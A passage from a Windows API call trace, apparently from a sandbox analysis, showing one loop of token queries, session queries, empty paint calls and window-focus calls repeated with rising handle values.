TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3c0) returned 1 [0221.098] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.098] GetLastError () returned 0x7a [0221.098] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.098] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.098] WTSFreeMemory (pMemory=0x0) [0221.098] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.098] TextOutW (hdc=0x0, x=1024, y=2324, lpString="", c=0) returned 1 [0221.099] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.104] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.105] GetTickCount () returned 0xe35b [0221.106] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.106] SetForegroundWindow (hWnd=0x0) returned 0 [0221.106] BringWindowToTop (hWnd=0x0) returned 0 [0221.106] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3c4) returned 1 [0221.106] GetTokenInformation (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.106] GetLastError () returned 0x7a [0221.106] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.106] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.107] WTSFreeMemory (pMemory=0x0) [0221.107] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.107] TextOutW (hdc=0x0, x=1034, y=2349, lpString="", c=0) returned 1 [0221.107] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.107] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.107] GetTickCount () returned 0xe35b [0221.108] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.108] SetForegroundWindow (hWnd=0x0) returned 0 [0221.108] BringWindowToTop (hWnd=0x0) returned 0 [0221.108] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3c8) returned 1 [0221.108] GetTokenInformation (in: TokenHandle=0x3c8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.108] GetLastError () returned 0x7a [0221.108] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.108] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.109] WTSFreeMemory (pMemory=0x0) [0221.109] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.109] TextOutW (hdc=0x0, x=1044, y=2374, lpString="", c=0) returned 1 [0221.109] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.109] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.109] GetTickCount () returned 0xe35b [0221.113] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.113] SetForegroundWindow (hWnd=0x0) returned 0 [0221.113] BringWindowToTop (hWnd=0x0) returned 0 [0221.113] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3cc) returned 1 [0221.113] GetTokenInformation (in: TokenHandle=0x3cc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.113] GetLastError () returned 0x7a [0221.113] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.113] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.114] WTSFreeMemory (pMemory=0x0) [0221.114] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.114] TextOutW (hdc=0x0, x=1054, y=2399, lpString="", c=0) returned 1 [0221.117] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.117] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.117] GetTickCount () returned 0xe36a [0221.117] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.117] SetForegroundWindow (hWnd=0x0) returned 0 [0221.117] BringWindowToTop (hWnd=0x0) returned 0 [0221.117] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3d0) returned 1 [0221.117] GetTokenInformation (in: TokenHandle=0x3d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.117] GetLastError () returned 0x7a [0221.117] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.118] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.118] WTSFreeMemory (pMemory=0x0) [0221.118] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.118] TextOutW (hdc=0x0, x=1064, y=2424, lpString="", c=0) returned 1 [0221.118] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.118] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.118] GetTickCount () returned 0xe36a [0221.120] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.120] SetForegroundWindow (hWnd=0x0) returned 0 [0221.120] BringWindowToTop (hWnd=0x0) returned 0 [0221.120] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3d4) returned 1 [0221.120] GetTokenInformation (in: TokenHandle=0x3d4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.120] GetLastError () returned 0x7a [0221.120] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.120] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.121] WTSFreeMemory (pMemory=0x0) [0221.121] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.121] TextOutW (hdc=0x0, x=1074, y=2449, lpString="", c=0) returned 1 [0221.121] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.121] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.121] GetTickCount () returned 0xe36a [0221.121] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.122] SetForegroundWindow (hWnd=0x0) returned 0 [0221.122] BringWindowToTop (hWnd=0x0) returned 0 [0221.122] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3d8) returned 1 [0221.122] GetTokenInformation (in: TokenHandle=0x3d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.122] GetLastError () returned 0x7a [0221.122] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.122] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.122] WTSFreeMemory (pMemory=0x0) [0221.122] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.122] TextOutW (hdc=0x0, x=1084, y=2474, lpString="", c=0) returned 1 [0221.122] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.123] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.123] GetTickCount () returned 0xe36a [0221.123] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.123] SetForegroundWindow (hWnd=0x0) returned 0 [0221.123] BringWindowToTop (hWnd=0x0) returned 0 [0221.123] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3dc) returned 1 [0221.123] GetTokenInformation (in: TokenHandle=0x3dc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.123] GetLastError () returned 0x7a [0221.123] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.123] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.124] WTSFreeMemory (pMemory=0x0) [0221.124] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.124] TextOutW (hdc=0x0, x=1094, y=2499, lpString="", c=0) returned 1 [0221.124] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.124] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.124] GetTickCount () returned 0xe36a [0221.132] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.132] SetForegroundWindow (hWnd=0x0) returned 0 [0221.132] BringWindowToTop (hWnd=0x0) returned 0 [0221.132] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3e0) returned 1 [0221.132] GetTokenInformation (in: TokenHandle=0x3e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.132] GetLastError () returned 0x7a [0221.132] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.132] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.133] WTSFreeMemory (pMemory=0x0) [0221.133] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.133] TextOutW (hdc=0x0, x=1104, y=2524, lpString="", c=0) returned 1 [0221.133] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.133] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.133] GetTickCount () returned 0xe37a [0221.133] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.133] SetForegroundWindow (hWnd=0x0) returned 0 [0221.134] BringWindowToTop (hWnd=0x0) returned 0 [0221.134] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3e4) returned 1 [0221.134] GetTokenInformation (in: TokenHandle=0x3e4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.134] GetLastError () returned 0x7a [0221.134] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.134] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.134] WTSFreeMemory (pMemory=0x0) [0221.134] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.134] TextOutW (hdc=0x0, x=1114, y=2549, lpString="", c=0) returned 1 [0221.134] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.135] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.135] GetTickCount () returned 0xe37a [0221.137] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.137] SetForegroundWindow (hWnd=0x0) returned 0 [0221.137] BringWindowToTop (hWnd=0x0) returned 0 [0221.137] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3e8) returned 1 [0221.137] GetTokenInformation (in: TokenHandle=0x3e8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.137] GetLastError () returned 0x7a [0221.137] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.137] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.138] WTSFreeMemory (pMemory=0x0) [0221.138] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.138] TextOutW (hdc=0x0, x=1124, y=2574, lpString="", c=0) returned 1 [0221.138] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.138] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.138] GetTickCount () returned 0xe37a [0221.138] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.138] SetForegroundWindow (hWnd=0x0) returned 0 [0221.138] BringWindowToTop (hWnd=0x0) returned 0 [0221.138] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3ec) returned 1 [0221.138] GetTokenInformation (in: TokenHandle=0x3ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.138] GetLastError () returned 0x7a [0221.138] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.138] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.139] WTSFreeMemory (pMemory=0x0) [0221.139] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.139] TextOutW (hdc=0x0, x=1134, y=2599, lpString="", c=0) returned 1 [0221.139] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.139] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.139] GetTickCount () returned 0xe37a [0221.139] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.140] SetForegroundWindow (hWnd=0x0) returned 0 [0221.140] BringWindowToTop (hWnd=0x0) returned 0 [0221.140] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3f0) returned 1 [0221.140] GetTokenInformation (in: TokenHandle=0x3f0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.140] GetLastError () returned 0x7a [0221.140] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.140] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.140] WTSFreeMemory (pMemory=0x0) [0221.140] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.140] TextOutW (hdc=0x0, x=1144, y=2624, lpString="", c=0) returned 1 [0221.140] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.140] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.140] GetTickCount () returned 0xe37a [0221.141] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.141] SetForegroundWindow (hWnd=0x0) returned 0 [0221.141] BringWindowToTop (hWnd=0x0) returned 0 [0221.141] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3f4) returned 1 [0221.141] GetTokenInformation (in: TokenHandle=0x3f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.141] GetLastError () returned 0x7a [0221.141] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.141] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.142] WTSFreeMemory (pMemory=0x0) [0221.142] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.142] TextOutW (hdc=0x0, x=1154, y=2649, lpString="", c=0) returned 1 [0221.142] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.142] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.142] GetTickCount () returned 0xe37a [0221.144] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.144] SetForegroundWindow (hWnd=0x0) returned 0 [0221.144] BringWindowToTop (hWnd=0x0) returned 0 [0221.144] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3f8) returned 1 [0221.144] GetTokenInformation (in: TokenHandle=0x3f8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.144] GetLastError () returned 0x7a [0221.144] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.144] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.144] WTSFreeMemory (pMemory=0x0) [0221.144] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.145] TextOutW (hdc=0x0, x=1164, y=2674, lpString="", c=0) returned 1 [0221.145] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.145] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.145] GetTickCount () returned 0xe37a [0221.145] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.145] SetForegroundWindow (hWnd=0x0) returned 0 [0221.145] BringWindowToTop (hWnd=0x0) returned 0 [0221.145] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3fc) returned 1 [0221.145] GetTokenInformation (in: TokenHandle=0x3fc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.145] GetLastError () returned 0x7a [0221.145] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.145] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.149] WTSFreeMemory (pMemory=0x0) [0221.149] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.150] TextOutW (hdc=0x0, x=1174, y=2699, lpString="", c=0) returned 1 [0221.150] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.150] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.150] GetTickCount () returned 0xe38a [0221.150] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.150] SetForegroundWindow (hWnd=0x0) returned 0 [0221.150] BringWindowToTop (hWnd=0x0) returned 0 [0221.150] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x404) returned 1 [0221.150] GetTokenInformation (in: TokenHandle=0x404, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.150] GetLastError () returned 0x7a [0221.150] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.150] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.151] WTSFreeMemory (pMemory=0x0) [0221.151] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.151] TextOutW (hdc=0x0, x=1184, y=2724, lpString="", c=0) returned 1 [0221.151] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.153] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.153] GetTickCount () returned 0xe38a [0221.154] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.154] SetForegroundWindow (hWnd=0x0) returned 0 [0221.154] BringWindowToTop (hWnd=0x0) returned 0 [0221.154] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x408) returned 1 [0221.154] GetTokenInformation (in: TokenHandle=0x408, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.154] GetLastError () returned 0x7a [0221.154] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.154] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.154] WTSFreeMemory (pMemory=0x0) [0221.154] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.154] TextOutW (hdc=0x0, x=1194, y=2749, lpString="", c=0) returned 1 [0221.155] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.155] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.155] GetTickCount () returned 0xe38a [0221.155] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.155] SetForegroundWindow (hWnd=0x0) returned 0 [0221.155] BringWindowToTop (hWnd=0x0) returned 0 [0221.155] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x40c) returned 1 [0221.155] GetTokenInformation (in: TokenHandle=0x40c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.155] GetLastError () returned 0x7a [0221.155] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.155] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.156] WTSFreeMemory (pMemory=0x0) [0221.156] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.156] TextOutW (hdc=0x0, x=1204, y=2774, lpString="", c=0) returned 1 [0221.156] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.156] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.156] GetTickCount () returned 0xe38a [0221.157] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.157] SetForegroundWindow (hWnd=0x0) returned 0 [0221.157] BringWindowToTop (hWnd=0x0) returned 0 [0221.157] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x410) returned 1 [0221.157] GetTokenInformation (in: TokenHandle=0x410, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.157] GetLastError () returned 0x7a [0221.157] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.157] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.158] WTSFreeMemory (pMemory=0x0) [0221.158] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.158] TextOutW (hdc=0x0, x=1214, y=2799, lpString="", c=0) returned 1 [0221.158] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.158] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.158] GetTickCount () returned 0xe38a [0221.158] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.158] SetForegroundWindow (hWnd=0x0) returned 0 [0221.158] BringWindowToTop (hWnd=0x0) returned 0 [0221.158] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x414) returned 1 [0221.158] GetTokenInformation (in: TokenHandle=0x414, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, 